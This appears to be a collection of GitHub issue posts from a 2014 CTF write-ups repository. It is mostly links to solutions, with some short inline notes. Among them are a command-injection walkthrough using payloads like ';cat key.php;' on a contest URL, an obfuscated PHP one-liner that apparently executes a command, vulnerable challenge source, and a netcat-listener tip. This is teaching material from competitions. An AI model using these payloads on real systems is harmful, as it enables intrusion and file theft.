ctfs / write-ups-2014 Goto Github PK

http://ppp.cylab.cmu.edu/wordpress/?p=1146

https://ctftime.org/event/97/tasks/

http://acez.re/ctf-writeup-defcon-quals-2014-turdedo/

Forked the solution of White Noise

00:03:30 <steeve> for 300? authlog -> html5.js -> /analytics.js -> announcement.pdf -> announcement.pdf | pdfstreamdumper

Incomplete write-up: https://github.com/ctfs/write-ups/blob/master/csaw-ctf-2014/fluffy-no-more/README.md First steps to be added.

http://gynvael.vexillium.org/dump/xxxx.php.txt:

<?php $_=~¾¬¬º­«; $_(~¯­¶±«.'('.~ÎÌÌÈ.')'); ?>

The ami_id parameter is vulnerable to command injection.

http://ctf247.2014.ghostintheshellcode.com/ec2.php?ami_id=;ls; or http://ctf247.2014.ghostintheshellcode.com/ec2.php?ami_id=%0als%0a

ec2-api-tools-1.6.12.0
ec2.php
index.html
index_files
key.php

http://ctf247.2014.ghostintheshellcode.com/ec2.php?ami_id=;cat%20key.php;

<?php
    /* flag{0aea26e968895efa40b563e3e8fe8f19} */
    echo('There\'s a key here.');
?>

Hey guys,

Here's a write-up on the binary 100 challenge from the HITB CTF in Amsterdam by team hDs.
http://cedricvb.be/post/reverse-engineering-the-hitb-binary-100-ctf-challenge/

Cheers /c

BBGP: https://privatepaste.com/6afd54f16c
BYHD: http://zepvn.com/blog/defcon-ctf-quals-2014-byhd.php
dosfun4u: https://github.com/nopple/ctf/tree/master/dosfun4u
heap: http://pastebin.com/iM6wCRqa

polyglot link is broken: http://sigint.ru/writeups/2014/05/18/defcon-2014-quals--polyglot/
also, another polyglot: https://gist.github.com/IdolfHatler/d952bf797a4d71cddbba

http://cseweb.ucsd.edu/~hovav/papers/hs09.html
paper: http://cseweb.ucsd.edu/~hovav/dist/reconstruction.pdf
source: http://cseweb.ucsd.edu/~hovav/dist/rsabits-1.0.tar.gz

Note that it's not a drop in solution, but it's supposedly pretty close.

This is live as of now: http://backdoor.cognizance.org.in

http://commandlinewani.blogspot.com/2014/01/ghostintheshellcode-write-up-dogecrypt.html

http://commandlinewani.blogspot.com/2014/01/ghostintheshellcode-write-up-lugkist.html

http://balidani.blogspot.com/2014/01/ghost-in-shellcode-2014-papsmear-writeup.html

My solution to pwn200. Slightly different approach (overwrite saved EIP instead of GOT): https://gist.github.com/Bartol0/283564a864e270b554ef

Revenge of Imgception consists of 8 stages. Each stage involves extracting one type of image from another. 

Prior to the game, a large number of images will be pre-generated to save processing power and reduce the infrastructure requirements of the challenge. Players will be presented with a randomly chosen image from this set. The idea is to cause confusion among the players, as two players working the challenge together are unlikely to receive the same image, though the challenge proceeds identically for all images. This behavior continues for the duration of the challenge, as the images for each stage are randomly selected when the challenge is generated. 

1-1: The file is a JPEG. The next stage is hidden in comment fields (\xFF\xFE). The number of comment fields is variable because they have a maximum size of 65535. 

2-1: The file is an animated GIF. The next stage is hidden in a set of comment extensions as binary data. The number of comment extensions is variable depending on the size of the next stage.

3-1: The file is a zip full of PNG files. The next stage is spread among them. Each PNG has a custom chunk marked with a "icTf" header. Each chunk begins with 3 bytes of the order string ("ThankYouMarioButOurPrincessIsInAnotherCastle" * 20) followed by a null byte, followed by binary data. The binary data chunks from each file must be concatenated together in the order given by the order string. The entirety of the order string may not be used, as the zip contains a variable number of files. 

4-1: The file is a floppy disk image containing the next stage. Nothing special about this one. The previous stage is complex enough to warrant a freebie. 

5-1: The file is a Super Mario Brothers ROM image for the Nintendo Entertainment System. It is playable in the fceux emulator, and the hope is that players will attempt to play through the game to continue to the next stage. However, the next stage has actually been concatenated to the end of the ROM, and is marked with "GITS" * 512. 

6-1: The file is an ISO image with a hidden directory. When mounted with default (linux) options, the only apparent file is a JPEG image. However, when mounted with the --no-joliet option, the next stage becomes apparent. 

7-1: The file is a multi-page TIFF image with broken file magic. The file magic is \x49\x4d\x2a\x2a. The TIFF file header indicates whether the image is little or big endian by the first two bytes being either \x49\x49 (little) or \x4d\x4d (big). The next two bytes are similarly arranged, either \x2a\x00 (little) or \x00\x2a (big). The correct file header for this image is \x49\x49\x2a\x00. Once the header is fixed, the image contains three images - one world 7-1 image and two apparently identical world 8-1 images that constitute the next stage. 

8-1: The files are two apparently identical greyscale BMP images. The images are not, however, identical. The final image is steganographically hidden in the delta between color byte values. By subtracting the byte values in one file from the corresponding byte in the other, some bytes will result in a value between -8 and +7. Each value represents a single nibble of the final image. 

The final image contains a congratulatory message and the key: K00pas@llth3w@yd0wn

Use exiftool to extract the comments from the images.

Not a write-up. To aim of this repo is to make it easy for anyone to simply clone and play against the benchmark: https://github.com/janosgyerik/stripe-ctf3

It's not done yet. I already added most of the test data to eliminate dependence on Stripe's AWS instances. I'm still working on precise instructions, especially with trickier build steps, for example Scala. I will clone on a virgin Ubuntu and see what works out of the box and what doesn't, and add the precise setup steps, probably mostly apt-get install name1 name2 ... commands.

See you tomorrow in London!

http://blog.dragonsector.pl/2014/03/exploits-for-recent-pwning-ctf-tasks.html

Source (released after the CTF):

<html>
<head>
<title>Emdee</title>
<style type='text/css'>
body { font-family: Verdana, sans-serif; font-size: 15px; }
em { font-family: monospace; font-style: normal; font-weight: bold; padding: 4px 10px; background: #eee; border: 1px solid #aaa; }
strong { color: #800000; }
</style>
</head>
<body><center>
<h2>Welcome to Emdee</h2>
Welcome to the Emdee service. We use the famous <a href='http://www.ietf.org/rfc/rfc1321.txt'>MD5</a> algorithm to help keep your data secret.<p/>
MD5 is a one-way function, but it has a flaw: one can precompute a ton of MD5 hashes and make a rainbow table.<p/>
To mitigate this, we compute <em>MD5( SALT + your_secret )</em> (patent pending).<br/><br/>

<h3>See for yourself</h3>
We took a short dictionary word, fed it into our <b>genuine patent-pending algorithm</b> and got:<p/>
<em>40288d60073775070a7edcdcd1df9c56  -</em>.<p/>
Can you restore our secret word? We don't think so!<br/><br/>

<h3>Try for yourself</h3>
<strong>As for our FREE service, current timestamp will be added to your_secret</strong><br/>
Purchase the paid package to get rid of timestamp and to use our <b>genuine patent-pending algorithm</b>.<p/>
<big><form method='POST'>Secret: <input type='password' name='secret' /> <input type='submit' value='&raquo;' /></form></big>
<?php
$salt = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";

if (isset($_POST['secret']) && $_POST['secret'] != "") {
  echo "Result: ";

  $timestamp = microtime(true);

  $descriptorspec = array(
     0 => array("pipe", "r"),
     1 => array("pipe", "w"),
     2 => array("pipe", "w")
  );
  $proc = proc_open('socat - exec:md5sum,pty,ctty,echo=0', $descriptorspec, $pipes);
  if (!$proc) {
    echo "<strong>Error occured</strong>";
  } else {
    $data = "$salt" . $_POST['secret'] . $timestamp . "\x04\x04";
    if (fwrite($pipes[0], $data) != strlen($data)) {
      echo "<strong>Error occured</strong>";
    }
    $res = "";
    while (!feof($pipes[1])) {
      $res .= fgetc($pipes[1]);
    }
    echo "MD5( SALT + your_secret + $timestamp ) = <em>" . htmlspecialchars(trim($res)) . "</em>";
  }
}
?>
</center></body>
</html>

Here's a writeup I wrote, with exploit: http://thejh.net/written-stuff/defcon-quals-2014-sftp-writeup

http://digitaloperatives.blogspot.com/2014/01/ghost-in-shellcode-2014-choose-your-pwn.html

http://digitaloperatives.blogspot.com/2014/01/gits-2014-write-up-collection.html

I've added most of them but I don't have info for 5 lastly released tasks.

Missing tasks, marked with ?

• http://cuby.hu/irc.freenode.net-%23hitcon-ctf.log
• http://cuby.hu/hitcon-writeups.txt (more likes notes.txt amirite)

https://olympic-ctf.ru/tasks

http://www.cravetocode.com/2014/03/defkthon-ctf-misc-200-writeup.html

would be happy if you link.

http://ctfarchive.phdays.com/phd4quals/
http://ctfarchive.phdays.com/phd4finals/

I posted a writeup on rarara.

http://jgeralnik.github.io/writeups/2014/06/12/rarara/

Cheers

https://www.youtube.com/watch?v=G50typU3mLg

Unbearable:

To solve this one you needed to edit local player attribute use accessory. The only accessory to edit is wine. Adjust the random range numbers to be 100 and the wine will give you invincibility and allow you to bypass the bears.

Moon Boots:

Similar to unbearable you needed to change the players initial jump velocity to something above 25. Then when you jump you wind up in space. Moon Boots!

Cave of Nope:

Again with jump edited you can jump over the wall in the spiders cave. Kill the big spider and you get the flag.

Boaring Quest:

http://tasteless.se/2014/01/gits-2014-a-boaring-quest-pwn-adventure-150/

http://ppp.cylab.cmu.edu/wordpress/?p=1152

http://www.ctf.dk/gits-2014-ti-1337
https://blog.skullsecurity.org/2014/ghost-in-the-shellcode-ti-1337-pwnable-100
http://delogrand.blogspot.com/2014/01/ghost-in-shellcode-2014-ti-1337.html
https://gist.github.com/withzombies/8514659

Hi, I've posted a writeup at my blog

http://blog.ztrix.me/blog/2014/05/10/asis-quals-2014-serial-number-writeup/

Could you include the link?

Thanks.

http://blog.zachorr.com/trustmemore/

Recently a couple developers created Gitbook, an easy application which converts GitHub repositories into modern html websites. I recently set it up for the WIP CTF Resources, and I think it provides another way to read and make use of these great write ups.

@mathiasbynens has expressed that he likes the structure of the repository as folders, as it represents the culture of CTFs and is very intuitive and simple. The best part of creating a Gitbook for the repository is that the regular master branch would remain the same and function as it does now.

Since this repository is very large and will only continue to grow, I think it would be best to only have the most recent 3 or 4 CTFs presented in the book. That way the most visited write-ups can be found in an eye-pleasing layout, while if someone wants to see old write-ups they can look in the repository itself as they do now.

The only issue I see as of now is the build series for updating the book. So far I have had to rebuild the whole book and import the SUMARRY.md every time there is a change. This is a very tedious process, but once an easier method is found it would a very simple process to have the book updated from changes in the master branch repository.

Hi, here's my writeup on Reversing 300 task from Defkthon CTF.

http://rce4fun.blogspot.com/2014/03/defkthon-ctf-2014-reversing-300-writeup.html

Thanks.

http://bitcoinctf.com/

Some write-ups are listed here, let's add them here as well!

http://nickthefrost.com/2014/05/10/asis-ctf-quals-2014-image/
http://nickthefrost.com/2014/05/10/asis-ctf-quals-2014-hidden-flag/

http://digitaloperatives.blogspot.com/2014/01/ghost-in-shellcode-2014-trivia-150.html

http://www.xexexe.cz/2014/05/ctf365com-first-blood-write-up.html

Hi, Recently I've searching for some of the solutions for hitcon-ctf 2014 and this is the solution for G8LA I would like to add this solution here this is a great initiative in ctf write ups.
Solution.
http://lockboxx.blogspot.com.es/2014/08/hitcon-2014-ctf-writeup-g8la-forensics.html

PD: I don't know how do you manage the addittions so I'm reporting this as issue.

Best Regards.

09:52:13 <j0f> mathiasbynens, easy way would be using remote img upload and pointing to a netcat listen port

Anyone want to explain this in a bit more detail add this alternate, easier solution to the write-up?

Extract the file.

Then open it in an audio editor e.g. Audacity on Linux and change the view from waveform to spectrogram. There’s a morse code that starts at around 18 seconds:

next steps: ???

I've added tasks from GPN CTF 2014. Some tasks, descriptions and additional files are missing but since nobody was adding those I though I would check in what I have.

http://ppp.cylab.cmu.edu/wordpress/?p=1140